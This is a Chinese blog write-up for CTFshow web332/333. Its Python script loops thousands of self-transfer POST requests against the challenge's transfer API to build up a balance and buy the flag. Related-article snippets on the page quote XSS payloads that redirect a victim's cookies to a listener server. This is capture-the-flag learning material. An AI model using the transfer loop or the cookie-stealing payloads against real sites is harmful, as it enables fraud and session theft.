web332,333

利用转账漏洞获取CTF挑战flag,
最新推荐文章于 2025-11-29 03:46:46 发布
原创 最新推荐文章于 2025-11-29 03:46:46 发布 · 126 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#json #开发语言 #python #爬虫

代码片段展示了尝试通过发送POST请求到特定URL来模拟给自己转账的过程,其中群主提到可以转负数的账。这可能是一个CTF(CaptureTheFlag)比赛中的安全漏洞挑战,目标可能是通过非法转账操作获取flag。

给自己疯狂转账就能买flag了

PS:332群主说可以转负数的账

import requests
import json

if __name__ == '__main__':
    #cookie = "PHPSESSID=abfirn2d40bsooodd2su5ebr5n"
    cookies = {'PHPSESSID': '3f4tqs9kb3q4kpubjp2n1l3nj8'}
    url='http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show/api/amount.php'
    header = {
        'POST': '/api/amount.php HTTP/1.1',
        'Host':'61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show',
        'User-Agent':'Mozilla / 5.0(WindowsNT10.0;Win64;x64;rv: 109.0) Gecko / 20100101Firefox / 110.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip, deflate',
        'Referer':'http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show/transfer.php',
        'Content-Type':'application/x-www-form-urlencoded',
        'Content-Length':'8',
        'Origin': 'http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show',
        'Connection':'keep-alive',
        'Cookie': 'PHPSESSID=3f4tqs9kb3q4kpubjp2n1l3nj8',
        'Upgrade-Insecure-Requests':'1'
    }
    # 发送
    post_dict = {'u': 'xm', 'a': '1000'}
    post_json = json.dumps({'some': 'data'})
    for i in range(1,3000):
        r3 = requests.post(url=url, data=post_dict, headers=header, cookies=cookies)
        print("r3返回的内容为-->" + r3.text)

CTFshow XSS(web316-333)
Kradress的博客
03-18 1059
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
CTFSHOW xss篇
羽的博客
12-28 9714
web316 xss平台 https://xss.pt/xss.php 创建项目 选择默认模块 一直下一步,然后随便那个代码放到题目输入框中 再刷新下题目 最后看下项目 结束
ctfshow XSS web316~web333
shinygod的博客
11-25 2348
ctfshow XSS web316~web333
ctfshow_xss
hcja666的博客
11-22 955
逻辑漏洞,注册一个账号,购买flag抓包,发现什么也没发现,于是进入转账汇款界面,给自己转账,本来我有5元,给自己转个5元看看,提示钱不足够,给admin转账1元,结果成功,再给自己转账1元,我又变回5元了,再转1元,我就有了6元,再给自己转六元还是提示余额不足,但是可以给自己转5元,变成11元,所以推测可以给自己转的最大💴数是当前余额-1元,我就先刷到321元,再转账300元抓包,发送到爆破模块,给自己转几百次300元。vps nc监听,进去注册账号后,先登录(不然不得)再修改密码,改成。
ctfshow-xxs-316-333-wp
2301_80915592的博客
03-15 1075
316.反射型 XSS(-326都是反射型)js恶意代码是存在于某个参数中,通过url后缀进行get传入,当其他用户点进这个被精心构造的url链接时,恶意代码就会被解析,从而盗取用户信息。来看题,先简单测试一下是xxs直接注入(代码意思是浏览器解析这段代码时,会弹出一个警告对话框,显示当前网页的所有 Cookie 信息)弹出flag=你不是管理员。显然,由于我们不是管理员,所以cookie参数是不正确的。
ctfshow web入门 xss web327--web333 存储型和七七八八的
2301_81040377的博客
07-18 1370
这道题貌似和反射型的xss差不多,直接打就行。
CTFshow-web入门 XSS316-333(已更新完)
2302_79841575的博客
08-03 1629
本文系统总结了XSS跨站脚本攻击的实战技巧,重点分析了反射型和存储型XSS的利用方法。通过系列靶场案例(web316-333),详细演示了不同过滤条件下的绕过方式:1)使用body/iframe/svg标签替代script;2)通过/**/注释符绕过空格过滤;3)利用window.open/document.cookie窃取会话信息;4)结合AJAX实现POST请求攻击。特别对存储型XSS的自动化利用场景(如修改管理员密码、资金转账)进行了深入剖析,展示了如何通过恶意脚本控制目标账户。文章还提供了CEYE监
【CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
brhhh_sehe的博客
12-19 1263
用户在输入框中输入图片地址存储到str变量中 然后在xss()函数里面给id为demo的标签设置内容(innerHTML) 内容是加载图片,所以我们输入时放一个无法加载的图片,然后触发onerror事件,在这个事件里面可以触发弹窗,注意构造payload的时候一定要把img标签进行闭合。自己语言的转义:我认为就是在该网站中,比如说存在留言功能,然后攻击者留言了一段恶意代码,这段留言是别的用户也可以访问到的,在其他用户查看这段留言的时候服务器进行解析,导致执行一些危险行为,这个整段过程就是跨站脚本攻击。
ctfshow XSS web316-web333 wp
mumuzi的博客
02-05 6271
可能写的有点啰嗦,记录自己做题的过程 文章目录web316web317web318web319web320web321web322web323web324web325web326web327web328web329web330web331web332web333 web316 后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的时候我们就能拿到admin的cookie。 这里有两种方法来获取,一种是在线的xss平台,如https:/
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 6143
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
ctfshow—XSS
cosmoslin的博客
02-05 1100
web 316(反射型) 测试<script>alert(1)</script>,无过滤 在服务器上开启监听 python3 -m http.server 39543 外带数据: <script>location.href="http://x.xx.xx.xx:39543/"+document.cookie</script> <script>window.location.href="http://x.xx.xx.xx:39543/"+docu
CTFshow-WEB入门-XSS
feng的博客
02-28 7143
前言 因为不太会javascript,所以对于xss的了解一直比较少,也不太会,这次做一下xss专题,学习一下xss。 web316 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! 意思是要生成链接,应该就还是获得管理员cookie这样的题目,大师傅们说题目的bot是每隔一段时间自动点击的。 可以利用xss平台: XSS平台 以后我都用自己vps。 首先测试一下<script>alert(1)</script>,弹窗成功,第一题应该是没有任何的过滤,所以直接打co
【CTF】ctfshow——web
m0_52923241的博客
09-19 4064
ctfshow之web通关web签到题(so easy)web2:SQL注入漏洞(联合查询)web3:文件包含漏洞web4:文件包含漏洞(日志注入)web5:md5绕过web6:SQL注入漏洞(空格被过滤)web7:SQL注入漏洞(盲注&sqlmap)布尔盲注sqlmapweb8:SQL注入漏洞(布尔盲注)web9:robots.txt + SQL注入 + md5web10web11:web12 web签到题(so easy) base64解码点这里 F12,看到有一串字符串,base64解码
测试 Securing Kamailio’s JSON-RPC over HTTP
fs交流的博客
11-27 413
kamailio # 启动 kamailio。
自定义协议设计与实践:从协议必要性到JSON流式处理
祯的博客
11-28 1058
本文探讨了自定义网络协议的必要性及其实现方法。首先分析了通用协议(如HTTP)的局限性:性能开销大、功能冗余、通信模式不匹配等问题。其次阐述了自定义协议的优势:极致性能、高度定制化、低资源消耗和增强安全性。文章详细介绍了自定义协议的应用场景(物联网、游戏、区块链等)和开发代价(高维护成本、调试困难等)。重点讲解了基于TCP的流式数据处理方法,提出"长度头+消息体"的解决方案,并给出基于jsoncpp的实现示例。
Java 信息采集系统
2501_90980137的博客
11-28 368
• 主流框架:OkHttp(轻量、高效,支持GET/POST、表单提交、文件上传,自动处理连接池、重定向)、HttpClient(Apache出品,功能全面,适合复杂请求场景)。• 网页解析(HTML/XML):Jsoup(强大的DOM解析,支持CSS选择器、XPath,简化HTML元素提取)、Dom4j(专注XML解析,适合结构化XML数据)。• 典型场景:网页数据爬取(新闻、商品信息)、接口数据采集(API接口返回的JSON/XML数据)、本地文件数据提取(Excel、CSV)。
Gemini 3 Pro Image Nano Banana 技术架构
最新发布
快搜CEO高德的博客
11-29 707
开源版 “Think + Image” 流程图 liaotian.chatdlm.cn
[HomeKey] 持久化配置 | NVS闪存->加载入RAM->C++对象管理
一个人知道自己为什么而活,他就能够接收任何一种生活
11-27 1354
持久化设备配置是HomeKey-ESP32项目中一个隐形但至关重要的层次 通过利用ESP32的非易失性存储(NVS)并将设置组织为逻辑C++对象,我们确保设备"记住"其身份和设置,提供一致且可靠的用户体验。这一关键能力意味着我们可以一次性设置智能门锁,即使电源闪烁,它也会保留其类似大脑的记忆。
[Harmony]应用图标资源需分层
Gamin
11-28 281
摘要:应用图标需按规范配置为前景图(foreground.png)和背景图(background.png)两层,尺寸必须为1024px*1024px。需在AppScope/resources/base/media目录下放置对应图片,并在module.json5中使用"$media:layered_image"引用,禁止使用自定义图标路径。图标资源不得自行裁切圆角或添加内间距,必须通过HUAWEI DevEco Studio 5.0.5.315及以上版本处理。
springframework.beans.factory.BeanCreationException: Error creating bean with name 'requestMappingHandlerMapping' defined in class path resource [org/springframework/boot/autoconfigure/web/servlet/WebMvcAutoConfiguration$EnableWebMvcConfiguration.class]: Invocation of init method failed; nested exception is java.lang.IllegalStateException: Ambiguous mapping. Cannot map 'taskCenterController' method com.huawei.SCLC_WEBNEW.controller.taskCenter.TaskCenterController#qryExecutingByUserId(String) to { [/taskCenter/qryExecuting]}: There is already 'taskCenterController' bean method com.huawei.SCLC_WEBNEW.controller.taskCenter.TaskCenterController#qryUnExecutedByUserId(String) mapped. at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1804) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:620) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.DefaultListableBeanFactory.preInstantiateSingletons(DefaultListableBeanFactory.java:955) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.context.support.AbstractApplicationContext.finishBeanFactoryInitialization(AbstractApplicationContext.java:920) ~[spring-context-5.3.27.jar:5.3.27] at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:583) ~[spring-context-5.3.27.jar:5.3.27] at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:145) ~[spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:780) [spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:453) [spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.run(SpringApplication.java:343) [spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1370) [spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1359) [spring-boot-2.5.15.jar:2.5.15] at com.huawei.SCLC_WEBNEW.AppStart.main(AppStart.java:16) [classes/:na] Caused by: java.lang.IllegalStateException: Ambiguous mapping. Cannot map 'taskCenterController' method com.huawei.SCLC_WEBNEW.controller.taskCenter.TaskCenterController#qryExecutingByUserId(String) to { [/taskCenter/qryExecuting]}: There is already 'taskCenterController' bean method com.huawei.SCLC_WEBNEW.controller.taskCenter.TaskCenterController#qryUnExecutedByUserId(String) mapped. at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry.validateMethodMapping(AbstractHandlerMethodMapping.java:669) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry.register(AbstractHandlerMethodMapping.java:635) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.registerHandlerMethod(AbstractHandlerMethodMapping.java:332) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.registerHandlerMethod(RequestMappingHandlerMapping.java:420) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.registerHandlerMethod(RequestMappingHandlerMapping.java:76) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.lambda$detectHandlerMethods$2(AbstractHandlerMethodMapping.java:299) ~[spring-webmvc-5.3.27.jar:5.3.27] at java.util.LinkedHashMap.forEach(LinkedHashMap.java:684) ~[na:1.8.0_261] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.detectHandlerMethods(AbstractHandlerMethodMapping.java:297) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.processCandidateBean(AbstractHandlerMethodMapping.java:266) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.initHandlerMethods(AbstractHandlerMethodMapping.java:225) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.afterPropertiesSet(AbstractHandlerMethodMapping.java:213) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.afterPropertiesSet(RequestMappingHandlerMapping.java:205) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.invokeInitMethods(AbstractAutowireCapableBeanFactory.java:1863) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1800) ~[spring-beans-5.3.27.jar:5.3.27] ... 16 common frames omitted
06-18
### 解决 Spring Boot 中 `Ambiguous mapping` 问题 在 Spring Boot 应用中,当出现 `Ambiguous mapping. Cannot map 'taskCenterController' method to { [/taskCenter/qryExecuting]}` 错误时,这通常意味着存在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值